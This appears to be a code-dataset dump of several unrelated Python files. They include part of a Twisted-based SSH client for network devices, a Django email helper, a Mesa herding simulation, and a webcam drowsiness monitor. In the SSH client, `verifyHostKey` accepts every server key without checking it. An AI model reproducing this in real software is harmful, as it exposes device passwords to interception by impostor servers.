_get_window_size(self):\n \"\"\"Measure the terminal.\"\"\"\n stdin_fileno = sys.stdin.fileno()\n winsz = fcntl.ioctl(stdin_fileno, tty.TIOCGWINSZ, '12345678')\n return struct.unpack('4H', winsz)\n\n def _execFailure(self, reason):\n \"\"\"Callback for when the exec command fails.\n \"\"\"\n self._commandConnected.errback(reason)\n\n\n def _execSuccess(self, ignored):\n \"\"\"Callback for when the exec command succees.\n \"\"\"\n self._protocol = self._protocolFactory.buildProtocol(\n SSHSessionAddress(\n self.conn.transport.transport.getPeer(),\n self.conn.transport.creator.username,\n self._command\n ))\n self._bind_protocol_data()\n self._protocol.makeConnection(self)\n self._commandConnected.callback(self._protocol)\n\n def _bind_protocol_data(self):\n \"\"\"Helper method to bind protocol related attributes to the channel.\n \"\"\"\n # This was a string before, now it's a NetDevice.\n self._protocol.device = self.conn.transport.creator.device or None\n\n # FIXME(jathan): Is this potentially non-thread-safe?\n self._protocol.startup_commands = copy(\n self._protocol.device.startup_commands\n )\n\n self._protocol.incremental = self.incremental or None\n self._protocol.prompt = self.prompt or None\n self._protocol.with_errors = self.with_errors or None\n self._protocol.timeout = self.timeout or None\n self._protocol.command_interval = self.command_interval or None\n\n def dataReceived(self, data):\n \"\"\"Callback for when data is received.\n\n Once data is received in the channel we defer to the protocol level dataReceived method.\n \"\"\"\n self._protocol.dataReceived(data)\n # SSHChannel.dataReceived(self, data)\n\n\nclass _TriggerUserAuth(_UserAuth):\n \"\"\"Perform user authentication over SSH.\"\"\"\n # The preferred order in which SSH authentication methods are tried.\n preferredOrder = settings.SSH_AUTHENTICATION_ORDER\n\n def getPassword(self, prompt=None):\n \"\"\"Send along the password.\"\"\"\n log.msg('Performing password authentication', debug=True)\n return defer.succeed(self.password)\n\n def getGenericAnswers(self, name, information, prompts):\n \"\"\"\n Send along the password when authentication mechanism is not 'password'\n This is most commonly the case with 'keyboard-interactive', which even\n when configured within self.preferredOrder, does not work using default\n getPassword() method.\n \"\"\"\n log.msg('Performing interactive authentication', debug=True)\n log.msg('Prompts: %r' % prompts, debug=True)\n\n # The response must always a sequence, and the length must match that\n # of the prompts list\n response = [''] * len(prompts)\n for idx, prompt_tuple in enumerate(prompts):\n prompt, echo = prompt_tuple # e.g. [('Password: ', False)]\n if 'assword' in prompt:\n log.msg(\"Got password prompt: %r, sending password!\" % prompt,\n debug=True)\n response[idx] = self.password\n\n return defer.succeed(response)\n\n def ssh_USERAUTH_FAILURE(self, packet):\n \"\"\"\n An almost exact duplicate of SSHUserAuthClient.ssh_USERAUTH_FAILURE\n modified to forcefully disconnect. If we receive authentication\n failures, instead of looping until the server boots us and performing a\n sendDisconnect(), we raise a `~trigger.exceptions.LoginFailure` and\n call loseConnection().\n See the base docstring for the method signature.\n \"\"\"\n canContinue, partial = common.getNS(packet)\n partial = ord(partial)\n log.msg('Previous method: %r ' % self.lastAuth, debug=True)\n\n # If the last method succeeded, track it. 
If network devices ever start\n # doing second-factor authentication this might be useful.\n if partial:\n self.authenticatedWith.append(self.lastAuth)\n # If it failed, track that too...\n else:\n log.msg('Previous method failed, skipping it...', debug=True)\n self.authenticatedWith.append(self.lastAuth)\n\n def orderByPreference(meth):\n \"\"\"\n Invoked once per authentication method in order to extract a\n comparison key which is then used for sorting.\n @param meth: the authentication method.\n @type meth: C{str}\n @return: the comparison key for C{meth}.\n @rtype: C{int}\n \"\"\"\n if meth in self.preferredOrder:\n return self.preferredOrder.index(meth)\n else:\n # put the element at the end of the list.\n return len(self.preferredOrder)\n\n canContinue = sorted([meth for meth in canContinue.split(',')\n if meth not in self.authenticatedWith],\n key=orderByPreference)\n\n log.msg('Can continue with: %s' % canContinue)\n log.msg('Already tried: %s' % self.authenticatedWith, debug=True)\n return self._cbUserauthFailure(None, iter(canContinue))\n\n def _cbUserauthFailure(self, result, iterator):\n \"\"\"Callback for ssh_USERAUTH_FAILURE\"\"\"\n if result:\n return\n try:\n method = iterator.next()\n except StopIteration:\n msg = (\n 'No more authentication methods available.\\n'\n 'Tried: %s\\n'\n 'If not using ssh-agent w/ public key, make sure '\n 'SSH_AUTH_SOCK is not set and try again.\\n'\n % (self.preferredOrder,)\n )\n self.transport.factory.err = exceptions.LoginFailure(msg)\n self.transport.loseConnection()\n else:\n d = defer.maybeDeferred(self.tryAuth, method)\n d.addCallback(self._cbUserauthFailure, iterator)\n return d\n\nclass _TriggerCommandTransport(_CommandTransport):\n def connectionSecure(self):\n \"\"\"\n When the connection is secure, start the authentication process.\n \"\"\"\n self._state = b'AUTHENTICATING'\n\n command = _ConnectionReady(self.connectionReady)\n\n self._userauth = _TriggerUserAuth(self.creator.username, command)\n self._userauth.password = self.creator.password\n if self.creator.keys:\n self._userauth.keys = list(self.creator.keys)\n\n if self.creator.agentEndpoint is not None:\n d = self._userauth.connectToAgent(self.creator.agentEndpoint)\n else:\n d = defer.succeed(None)\n\n def maybeGotAgent(ignored):\n self.requestService(self._userauth)\n d.addBoth(maybeGotAgent)\n\n\nclass _TriggerSessionTransport(_TriggerCommandTransport):\n def verifyHostKey(self, hostKey, fingerprint):\n hostname = self.creator.hostname\n ip = self.transport.getPeer().host\n\n self._state = b'SECURING'\n return defer.succeed(1)\n\n\nclass _NewTriggerConnectionHelperBase(_NewConnectionHelper):\n \"\"\"\n Return object used for establishing an async session rather than executing\n a single command.\n \"\"\"\n def __init__(self, reactor, device, port, username, keys, password,\n agentEndpoint, knownHosts, ui):\n self.reactor = reactor\n self.device = device\n self.hostname = device.nodeName\n self.port = port\n self.username = username\n self.keys = keys\n self.password = password\n self.agentEndpoint = agentEndpoint\n if knownHosts is None:\n knownHosts = self._knownHosts()\n self.knownHosts = knownHosts\n self.ui = ui\n\n def secureConnection(self):\n protocol = _TriggerSessionTransport(self)\n ready = protocol.connectionReady\n\n sshClient = TCP4ClientEndpoint(self.reactor, self.hostname, self.port)\n\n d = connectProtocol(sshClient, protocol)\n d.addCallback(lambda ignored: ready)\n return d\n\n\nclass TriggerEndpointClientFactory(protocol.Factory):\n \"\"\"\n Factory 
for all clients. Subclass me.\n \"\"\"\n def __init__(self, creds=None, init_commands=None):\n self.creds = tacacsrc.validate_credentials(creds)\n self.results = []\n self.err = None\n\n # Setup and run the initial commands\n if init_commands is None:\n init_commands = [] # We need this to be a list\n self.init_commands = init_commands\n log.msg('INITIAL COMMANDS: %r' % self.init_commands, debug=True)\n self.initialized = False\n\n def clientConnectionFailed(self, connector, reason):\n \"\"\"Do this when the connection fails.\"\"\"\n log.msg('Client connection failed. Reason: %s' % reason)\n self.d.errback(reason)\n\n def clientConnectionLost(self, connector, reason):\n \"\"\"Do this when the connection is lost.\"\"\"\n log.msg('Client connection lost. Reason: %s' % reason)\n if self.err:\n log.msg('Got err: %r' % self.err)\n # log.err(self.err)\n self.d.errback(self.err)\n else:\n log.msg('Got results: %r' % self.results)\n self.d.callback(self.results)\n\n def stopFactory(self):\n # IF we're out of channels, shut it down!\n log.msg('All done!')\n\n def _init_commands(self, protocol):\n \"\"\"\n Execute any initial commands specified.\n\n :param protocol: A Protocol instance (e.g. action) to which to write\n the commands.\n \"\"\"\n if not self.initialized:\n log.msg('Not initialized, sending init commands', debug=True)\n for next_init in self.init_commands:\n log.msg('Sending: %r' % next_init, debug=True)\n protocol.write(next_init + '\\r\\n')\n else:\n self.initialized = True\n\n def connection_success(self, conn, transport):\n log.msg('Connection success.')\n self.conn = conn\n self.transport = transport\n log.msg('Connection information: %s' % self.transport)\n\nclass TriggerSSHShellClientEndpointBase(SSHCommandClientEndpoint):\n \"\"\"\n Base class for SSH endpoints.\n\n Subclass me when you want to create a new ssh client.\n \"\"\"\n @classmethod\n def newConnection(cls, reactor, username, device, keys=None, password=None,\n port=22, agentEndpoint=None, knownHosts=None, ui=None):\n\n helper = _NewTriggerConnectionHelperBase(\n reactor, device, port, username, keys, password, agentEndpoint,\n knownHosts, ui\n )\n return cls(helper)\n\n @classmethod\n def existingConnection(cls, connection):\n \"\"\"Overload stock existinConnection to not require ``commands``.\"\"\"\n helper = _ExistingConnectionHelper(connection)\n return cls(helper)\n\n def __init__(self, creator):\n self._creator = creator\n\n def _executeCommand(self, connection, protocolFactory, command, incremental,\n with_errors, prompt_pattern, timeout, command_interval):\n \"\"\"Establish the session on a given endpoint.\n\n For IOS like devices this is normally just a null string.\n \"\"\"\n commandConnected = defer.Deferred()\n def disconnectOnFailure(passthrough):\n # Close the connection immediately in case of cancellation, since\n # that implies user wants it gone immediately (e.g. 
a timeout):\n immediate = passthrough.check(CancelledError)\n self._creator.cleanupConnection(connection, immediate)\n return passthrough\n commandConnected.addErrback(disconnectOnFailure)\n\n channel = _TriggerShellChannel(\n self._creator, command, protocolFactory, commandConnected, incremental,\n with_errors, prompt_pattern, timeout, command_interval)\n connection.openChannel(channel)\n self.connected = True\n return commandConnected\n\n def connect(self, factory, command='', incremental=None,\n with_errors=None, prompt_pattern=None, timeout=0,\n command_interval=1):\n \"\"\"Method to initiate SSH connection to device.\n\n :param factory: Trigger factory responsible for setting up connection\n :type factory: `~trigger.twister2.TriggerEndpointClientFactory`\n \"\"\"\n d = self._creator.secureConnection()\n d.addCallback(self._executeCommand, factory, command, incremental,\n with_errors, prompt_pattern, timeout, command_interval)\n return d\n\n\nclass IoslikeSendExpect(protocol.Protocol, TimeoutMixin):\n \"\"\"\n Action for use with TriggerTelnet as a state machine.\n\n Take a list of commands, and send them to the device until we run out or\n one errors. Wait for a prompt after each.\n \"\"\"\n def __init__(self):\n self.device = None\n self.commands = []\n self.commanditer = iter(self.commands)\n self.connected = False\n self.disconnect = False\n self.initialized = False\n self.startup_commands = []\n # FIXME(tom) This sux and should be set by trigger settings\n self.timeout = 10\n self.on_error = defer.Deferred()\n self.todo = deque()\n self.done = None\n self.doneLock = defer.DeferredLock()\n\n def connectionMade(self):\n \"\"\"Do this when we connect.\"\"\"\n self.connected = True\n self.finished = defer.Deferred()\n self.results = self.factory.results = []\n self.data = ''\n log.msg('[%s] connectionMade, data: %r' % (self.device, self.data))\n # self.factory._init_commands(self)\n\n def connectionLost(self, reason):\n self.finished.callback(None)\n\n\n # Don't call _send_next, since we expect to see a prompt, which\n # will kick off initialization.\n\n def _schedule_commands(self, results, commands):\n \"\"\"Schedule commands onto device loop.\n\n This is the actual routine to schedule a set of commands onto a device.\n\n :param results: Typical twisted results deferred\n :type results: twisted.internet.defer\n :param commands: List containing commands to schedule onto device loop.\n :type commands: list\n \"\"\"\n d = defer.Deferred()\n self.todo.append(d)\n \n # Schedule next command to run after the previous\n # has finished.\n if self.done and self.done.called is False:\n self.done.addCallback(\n self._schedule_commands,\n commands\n )\n self.done = d\n return d\n\n # First iteration, setup the previous results deferred.\n if not results and self.done is None:\n self.done = defer.Deferred() \n self.done.callback(None)\n\n # Either initial state or we are ready to execute more commands.\n if results or self.done is None or self.done.called:\n log.msg(\"SCHEDULING THE FOLLOWING {0} :: {1} WAS PREVIOUS RESULTS\".format( commands, self.done))\n self.commands = commands\n self.commanditer = iter(commands)\n self._send_next()\n self.done = d\n\n # Each call must return a deferred.\n return d\n\n def add_commands(self, commands, on_error):\n \"\"\"Add commands to abstract list of outstanding commands to execute\n\n The public method for `~trigger.netdevices.NetDevice` to use for appending more commands\n onto the device loop.\n\n :param commands: A list of commands to schedule onto 
device\"\n :type commands: list\n :param on_error: Error handler\n :type on_error: func\n \"\"\"\n # Exception handler to be used in case device throws invalid command warning.\n self.on_error.addCallback(on_error)\n d = self.doneLock.run(self._schedule_commands, None, commands)\n return d\n\n def dataReceived(self, bytes):\n \"\"\"Do this when we get data.\"\"\"\n log.msg('[%s] BYTES: %r' % (self.device, bytes))\n self.data += bytes # See if the prompt matches, and if it doesn't, see if it is waiting\n # for more input (like a [y/n]) prompt), and continue, otherwise return\n # None\n m = self.prompt.search(self.data)\n if not m:\n # If the prompt confirms set the index to the matched bytes,\n if is_awaiting_confirmation(self.data):\n log.msg('[%s] Got confirmation prompt: %r' % (self.device,\n self.data))\n prompt_idx = self.data.find(bytes)\n else:\n return None\n else:\n # Or just use the matched regex object...\n prompt_idx = m.start()\n\n result = self.data[:prompt_idx]\n # Trim off the echoed-back command. This should *not* be necessary\n # since the telnet session is in WONT ECHO. This is confirmed with\n # a packet trace, and running self.transport.dont(ECHO) from\n # connectionMade() returns an AlreadyDisabled error. What's up?\n log.msg('[%s] result BEFORE: %r' % (self.device, result))\n result = result[result.find('\\n')+1:]\n log.msg('[%s] result AFTER: %r' % (self.device, result))\n\n if self.initialized:\n self.results.append(result)\n\n if has_ioslike_error(result) and not self.with_errors:\n log.msg('[%s] Command failed: %r' % (self.device, result))\n self.factory.err = exceptions.IoslikeCommandFailure(result)\n else:\n if self.command_interval:\n log.msg('[%s] Waiting %s seconds before sending next command' %\n (self.device, self.command_interval))\n\n reactor.callLater(self.command_interval, self._send_next)\n\n def _send_next(self):\n \"\"\"Send the next command in the stack.\"\"\"\n self.data = ''\n self.resetTimeout()\n\n if not self.initialized:\n log.msg('[%s] Not initialized, sending startup commands' %\n self.device)\n if self.startup_commands:\n next_init = self.startup_commands.pop(0)\n log.msg('[%s] Sending initialize command: %r' % (self.device,\n next_init))\n self.transport.write(next_init.strip() + self.device.delimiter)\n return None\n else:\n log.msg('[%s] Successfully initialized for command execution' %\n self.device)\n self.initialized = True\n\n if self.incremental:\n self.incremental(self.results)\n\n try:\n next_command = self.commanditer.next()\n except StopIteration:\n log.msg('[%s] No more commands to send, moving on...' 
%\n self.device)\n\n if self.todo:\n payload = list(reversed(self.results))[:len(self.commands)]\n payload.reverse()\n d = self.todo.pop()\n d.callback(payload)\n return d\n else:\n return\n\n if next_command is None:\n self.results.append(None)\n self._send_next()\n else:\n log.msg('[%s] Sending command %r' % (self.device, next_command))\n self.transport.write(next_command + '\\n')\n\n def timeoutConnection(self):\n \"\"\"Do this when we timeout.\"\"\"\n log.msg('[%s] Timed out while sending commands' % self.device)\n self.factory.err = exceptions.CommandTimeout('Timed out while '\n 'sending commands')\n self.transport.loseConnection()\n","sub_path":"python/trigger/package-latest/trigger/twister2.py","file_name":"twister2.py","file_ext":"py","file_size_in_byte":23923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"73881144","text":"from django.conf import settings\nfrom django.core.mail import send_mass_mail\nfrom django.template.loader import render_to_string\n\nfrom libs.string_utils import strip_spaces\n\n\ndef render_mail_template(subject_template, body_template, context):\n \"\"\"\n Renders both the subject and body templates in the given context.\n Returns a tuple (subject, body) of the result.\n \"\"\"\n try:\n subject = strip_spaces(render_to_string(subject_template, context))\n body = render_to_string(body_template, context)\n finally:\n pass\n\n return subject, body\n\n\ndef send_mass_template_mail(subject_template, body_template, recipients, context=None):\n \"\"\"\n Renders an email subject and body using the given templates and context,\n then sends it to the given recipients list.\n\n The emails are send one-by-one.\n \"\"\"\n if context:\n subject, body = render_mail_template(subject_template, body_template, context)\n else:\n subject, body = subject_template, body_template\n\n message_tuples = [(subject, body, settings.DEFAULT_FROM_EMAIL, [r]) for r in recipients]\n\n send_mass_mail(message_tuples)\n\n\ndef send_mass_user_template_mail(subject_template, body_template, users, context):\n \"\"\"\n Similar to `send_mass_template_mail` this function renders the given templates\n into email subjects and bodies.\n\n The emails are send one-by-one.\n \"\"\"\n message_tuples = []\n for user in users:\n context['user'] = user\n subject, body = render_mail_template(subject_template, body_template, context)\n\n message_tuples.append((subject, body, settings.DEFAULT_FROM_EMAIL, [user.email]))\n\n if message_tuples:\n send_mass_mail(message_tuples)\n","sub_path":"polyaxon/action_manager/utils/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"420687808","text":"from mesa import Agent, Model, space\nimport random\nimport movement_control, cow_methods\nimport numpy as np\n\nclass CowAgent(Agent):\n \"\"\" Cow Agent with swarming behavior.\"\"\"\n def __init__(self, unique_id, model):\n super().__init__(unique_id, model)\n print(\"creating cow agent\")\n \n #stop moving once in goal\n self.herded = False\n \n #how far the cow can see - used in cell weight calculation\n self.cow_visibility = 3\n \n \n # weights based on cows from Multi Agent Programming Contest\n self.COWWEIGHT = 10.0;\n self.EMPTYWEIGHT = 3.0;\n self.CORRALWEIGHT = 3.0;\n self.AGENTWEIGHT = -200.0;\n self.OBSTACLEWEIGHT = -4.0;\n\n def step(self):\n if(not(self.herded)):\n self.move()\n self.herded = cow_methods.cow_herded(self)\n 
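# Re-check after the move: a cow that has just entered the corral stops roaming\n            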
if(self.herded):\n # take a step back so entrance isn't blocked\n print(\"COW HERDED COW HERDED COW HERDED COW HERDED COW HERDED \")\n cow_methods.step_back(self)\n #else:\n #print(\"cow agent herded, not moving\")\n\n def move(self):\n possible_steps = movement_control.find_empty_location(self.pos, self.model)\n \n #select new position based on cow behavior algorithm from Multi Agent Programming Contest\n new_position = self.cow_behavior(possible_steps)\n\n if (new_position is not None):\n self.model.grid.move_agent(self, new_position)\n \n def cow_behavior(self, possible_steps):\n new_position = None\n #calculate the weights of each cell and list cells with max weight\n best_locations = self.calculate_weights(possible_steps)\n \n #randomly pick from maximum weight cells\n if best_locations:\n new_position = random.choice(best_locations)\n else:\n new_position = self.pos # don't move if there is nowhere to go\n \n return new_position\n \n def calculate_weights(self, possible_steps):\n best_locations = []\n best_score = -np.inf\n for cell in possible_steps:\n cell_weight = self.calculate_single_weight(cell)\n if cell_weight > best_score:\n best_locations = [cell]\n best_score = cell_weight\n elif cell_weight == best_score:\n best_locations.append(cell)\n return best_locations\n\n def calculate_single_weight(self, cell):\n \"\"\" Calculate the weight of cell based on visibility radius\"\"\"\n cell_weight = 0.0\n neighborhood_cells = self.model.grid.get_neighborhood(cell, moore=True, include_center=False, radius=self.cow_visibility)\n for neighbor in neighborhood_cells:\n distance = movement_control.get_distance(self.model.grid, cell, neighbor)\n weight = self.get_weight(neighbor)\n cell_weight += (weight/distance)\n return cell_weight\n \n \n def get_weight(self, cell):\n weight = 0.0\n #print(\"getting weight of \", cell)\n \"\"\" get the weight value based on contents of a cell \"\"\"\n if self.model.grid.is_cell_empty(cell):\n weight = self.EMPTYWEIGHT\n else:\n agent = self.model.grid.get_cell_list_contents(cell)[0]\n weight = cow_methods.determine_weight(agent)\n #print(\"the cell contains\", type(agent))\n #if type(agent) is WallAgent:\n # weight = self.OBSTACLEWEIGHT\n #if type(agent) is RandomAgent:\n # weight = self.AGENTWEIGHT\n #if type(agent) is CowAgent:\n # weight = self.COWWEIGHT\n #if type(agent) is PlanAgent:\n # weight = self.AGENTWEIGHT\n #print(\"weight is \", weight)\n return weight\n \n\n\n #def calculate_weights(self, possible_cells):\n # \"\"\"Return weights as stated in Multi Agent Programming Contest\"\"\"\n # print(\"cells are \", possible_cells)\n # \n # cells_in_view = \n # \n # for cell in possible_cells:\n # weight = 0\n # #if empty/corral, weight = 3\n # if self.model.grid.is_cell_empty(cell):\n # weight = 3\n # print(\"empty cell weight is 3\")\n # else:\n # agent = self.model.grid.get_cell_list_contents(cell)\n # print(\"the cell contains\", type(agent))\n #if cow, weight = 10\n #if agent, weight = -200\n #if obstacle, weight = -4\n","sub_path":"cow_agent.py","file_name":"cow_agent.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71493","text":"import pandas as pd\nimport matplotlib as mpl\nimport seaborn as sns\nimport csv\n\nfrom sklearn import preprocessing\nfrom matplotlib import pyplot as plt\n\ndef Normalization():\n data_file = \"..\\PRSA2017_Data_20130301-20170228\\PRSA_Data_20130301-20170228\\simpleDataSet.csv\"\n pd_data = pd.read_csv(data_file)\n 
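# Standardize each selected column to zero mean and unit variance (z-score)\n    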
sam = []\n a = [\"PM10\", \"SO2\",\"NO2\",\"CO\",\"PRES\",\"DEWP\"]\n for i in a:\n y = pd_data.loc[:, i]\n ys = list(preprocessing.scale(y))\n sam.append(ys)\n\n print(len(sam))\n with open('eth2.csv', 'w') as file:\n writer = csv.writer(file)\n for i in range(len(sam[0])):\n writer.writerow([sam[0][i],sam[1][i],sam[2][i],sam[3][i],sam[4][i],sam[5][i]])\n","sub_path":"5 环境污染的预测/pm2.5的线性回归预测模型-今天睡醒了吗/Normalization.py","file_name":"Normalization.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"29464080","text":"from scipy.spatial import distance as dist\r\nfrom imutils.video import VideoStream\r\nfrom imutils import face_utils\r\nfrom threading import Thread\r\nimport argparse\r\nimport pandas as pd\r\nimport numpy as np\r\nimport playsound\r\nimport imutils\r\nimport time\r\nimport dlib\r\nimport cv2\r\nimport pandas as pd\r\n\r\n\r\n\r\nstart_time=time.time()\r\n\r\n\r\n\r\n\r\ndef eye_aspect_ratio(eye):\r\n\t# compute the euclidean distances between the two sets of\r\n\t# vertical eye landmarks (x, y)-coordinates\r\n\tA = dist.euclidean(eye[1], eye[5])\r\n\tB = dist.euclidean(eye[2], eye[4])\r\n\r\n\t# compute the euclidean distance between the horizontal\r\n\t# eye landmark (x, y)-coordinates\r\n\tC = dist.euclidean(eye[0], eye[3])\r\n\r\n\t# compute the eye aspect ratio\r\n\tear = (A + B) / (2.0 * C)\r\n\r\n\t# return the eye aspect ratio\r\n\treturn ear\r\n\r\ndef smile_ratio(mouth):\r\n left = mouth[0]\r\n top = mouth[3]\r\n right = mouth[6]\r\n bottom = mouth[9]\r\n return (dist.euclidean(left,top)+dist.euclidean(right,top))/(dist.euclidean(left,bottom)+dist.euclidean(right,bottom))\r\n\r\ndef isSmiling(SmileRatio):\r\n return (SmileRatio<0.85)\r\n \r\ndef yawn_ratio(mouth):\r\n\tleft = mouth[0]\r\n\ttop = mouth[3]\r\n\tright = mouth[6]\r\n\tbottom = mouth[9]\r\n\treturn dist.euclidean(top,bottom)/dist.euclidean(left,right)\r\n\r\ndef isYawning(YawnRatio):\r\n\treturn (YawnRatio>0.6)\r\n\t\r\ndef look_away(points):\r\n\tleft = points[0]\r\n\tright = points[1]\r\n\tcenter = points[2]\r\n\treturn dist.euclidean(left,center)/dist.euclidean(center,right)\r\n\t\r\n\t\r\n\t\r\n\r\ndata_dict={}\r\ndata_dict['time_away']=0\r\ndata_dict['yawn']=0\r\ndata_dict['Blinks'] = 0\r\ndata_dict['Looked_Away']=0\r\ndata_dict['time_smiling'] = 0\r\n\r\ndist_arr=[]\r\ndrowsy_arr=[]\r\n\r\nEYE_AR_THRESH = 0.3\r\nEYE_AR_CONSEC_FRAMES_blink = 3\r\nEYE_AR_CONSEC_FRAMES_drowsy = 48\r\nYAWN_THRESH = 30\r\nSMILE_CONSEC_FRAMES = 30\r\n\r\n# initialize the frame counters and the total number of blinks\r\nBLINK_COUNTER = 0\r\nDROWSY_COUNTER=0\r\nYAWNCOUNTER = 0\r\nSMILECOUNTER = 0\r\n\r\nALARM_ON=False\r\n\r\n(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\r\n(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\r\n(mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\r\n\r\ndetector = dlib.get_frontal_face_detector()\r\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\r\n\r\n\r\nvs = VideoStream(src=0).start()\r\n# vs = VideoStream(usePiCamera=True).start()\r\nfileStream = False\r\ntime.sleep(1.0)\r\nlooking_away_timer=0\r\nsmiling_timer = 0\r\ntemp_count=0\r\nprev_time=float('Inf')\r\nsmile_start_time = float('Inf')\r\n\r\nwhile True:\r\n\tif fileStream and not vs.more():\r\n\t\tbreak\r\n\r\n\tframe = vs.read()\r\n\tframe = imutils.resize(frame, width=450)\r\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\trects = detector(gray, 
0)\r\n\r\n\r\n\tlooking_away_timer+=1\r\n\t\r\n\tif(time.time()-prev_time>3 and temp_count==0):\r\n\t\t\tprint('looking away')\r\n\t\t\tcur_time=time.time()\r\n\t\t\tdata_dict['Looked_Away']+=1\r\n\t\t\ttemp_count=1\r\n\t\t\r\n\t\r\n\tfor rect in rects:\r\n\t\tprev_time=time.time()\r\n\t\tif(temp_count==1):\r\n\t\t\tdata_dict['time_away']+=(prev_time-cur_time)\r\n\t\t\ttemp_arr=[cur_time,prev_time]\r\n\t\t\tdist_arr.append(temp_arr)\r\n\t\t\ttemp_count=0\r\n\t\t\tprint(temp_arr)\r\n\t\t\r\n\t\tlooking_away_timer=0\r\n\t\t\r\n\r\n\t\t\r\n\t\tshape = predictor(gray, rect)\r\n\t\tshape = face_utils.shape_to_np(shape)\r\n\r\n\t\tleftEye = shape[lStart:lEnd]\r\n\t\trightEye = shape[rStart:rEnd]\r\n\t\tleftEAR = eye_aspect_ratio(leftEye)\r\n\t\trightEAR = eye_aspect_ratio(rightEye)\r\n\t\tmouth = shape[mStart:mEnd]\r\n\t\tSmileRatio = smile_ratio(mouth)\r\n\t\tYawnRatio = yawn_ratio(mouth)\r\n\t\tpoints = [shape[0],shape[16],shape[27],shape[33],shape[8]]\r\n\t\tif (isSmiling(SmileRatio)):\r\n\t\t\tsmile ='smiling'\r\n\t\telse:\r\n\t\t\tsmile ='not smiling'\r\n\t\t\t\r\n\t\tif (isYawning(YawnRatio)):\r\n\t\t\tyawn ='yawning'\r\n\t\telse:\r\n\t\t\tyawn ='not yawning'\r\n\t\t\t\r\n\t\tif(isSmiling(SmileRatio)):\r\n\t\t\tSMILECOUNTER+=1\r\n\t\t\tif(smile_start_time==float('inf')):\r\n\t\t\t\tsmile_start_time = time.time()\r\n\t\telse:\r\n\t\t\tif(SMILECOUNTER>SMILE_CONSEC_FRAMES):\r\n\t\t\t\tdata_dict['time_smiling']+= time.time()-smile_start_time\r\n\t\t\t\ttemp_arr=[smile_start_time,time.time()]\r\n\t\t\t\tdist_arr.append(temp_arr)\r\n\t\t\t\tsmile_start_time = float('Inf')\r\n\t\t\tSMILECOUNTER=0\r\n\t\t\t\r\n\t\tif(isYawning(YawnRatio)):\r\n\t\t\tYAWNCOUNTER+=1\r\n\t\telse:\r\n\t\t\tif(YAWNCOUNTER>YAWN_THRESH):\r\n\t\t\t\tdata_dict['yawn']+=1\r\n\t\t\tYAWNCOUNTER=0\r\n\t\t\r\n\t\tear = (leftEAR + rightEAR) / 2.0\r\n\r\n\t\tleftEyeHull = cv2.convexHull(leftEye)\r\n\t\trightEyeHull = cv2.convexHull(rightEye)\r\n\t\t\r\n\t\tcv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\r\n\r\n\t\tif (ear < EYE_AR_THRESH):\r\n\t\t\tBLINK_COUNTER += 1\r\n\t\t\tDROWSY_COUNTER += 1\r\n\t\t\t\r\n\t\t\tif(DROWSY_COUNTER>=EYE_AR_CONSEC_FRAMES_drowsy):\r\n\t\t\t\tdrowsy_arr.append(DROWSY_COUNTER)\r\n\t\t\t\tALARM_ON=True\r\n\t\t\t\tcv2.putText(frame, \"Drowsiness: {:.2f}\".format(ear), (300, 30),cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\t\telse:\r\n\t\t\tdrowsy_arr.append(0)\r\n\t\t\t\r\n\t\t\t# if the eyes were closed for a sufficient number of\r\n\t\t\t# then increment the total number of blinks\r\n\t\t\tif BLINK_COUNTER >= EYE_AR_CONSEC_FRAMES_blink:\r\n\t\t\t\tdata_dict['Blinks'] += 1\r\n\t\t\t\r\n\t\t\tBLINK_COUNTER = 0\r\n\t\t\tDROWSY_COUNTER = 0\r\n\t\t\t\r\n \r\n \r\n\r\n\r\n\t\t# draw the total number of blinks on the frame along with\r\n\t\t# the computed eye aspect ratio for the frame\r\n\t\tcv2.putText(frame, smile, (10, 30),\r\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\r\n\t\tcv2.putText(frame, yawn, (10, 50),\r\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\r\n\t\tfor (x,y) in points:\r\n\t\t\tcv2.circle(frame, (x, y), 1, (0, 0, 255), -1)\r\n\t\tcv2.putText(frame, str(look_away(points)), (300, 30),\r\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\r\n\t# show the frame\r\n\tcv2.imshow(\"Frame\", frame)\r\n\tkey = cv2.waitKey(1) & 0xFF\r\n\r\n\t# if the `q` key was pressed, break from the loop\r\n\tif key == 
ord(\"q\"):\r\n\t\tdata=pd.read_csv('data.csv')\r\n\t\t\r\n\t\tdata_dict['Total_working_time']=time.time()-start_time\r\n\t\tdata_dict['dist_times']=dist_arr\r\n\t\tdata_dict['drowsy_times']=drowsy_arr\r\n\t\t\r\n\t\tdata=data.append(data_dict,ignore_index=True)\r\n\t\tdata.to_csv('data.csv',index=False)\r\n\r\n\t\tbreak\r\n\r\n# do a bit of cleanup\r\ncv2.destroyAllWindows()\r\nvs.stop()\r\n\r\n#data=pd.read_csv('C:\\\\Users\\\\nomif\\\\Desktop\\\\Intution\\\\data.csv')\r\n#print(data)\r\n","sub_path":"ProductivityAnalyser/howProductive.py","file_name":"howProductive.py","file_ext":"py","file_size_in_byte":6101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
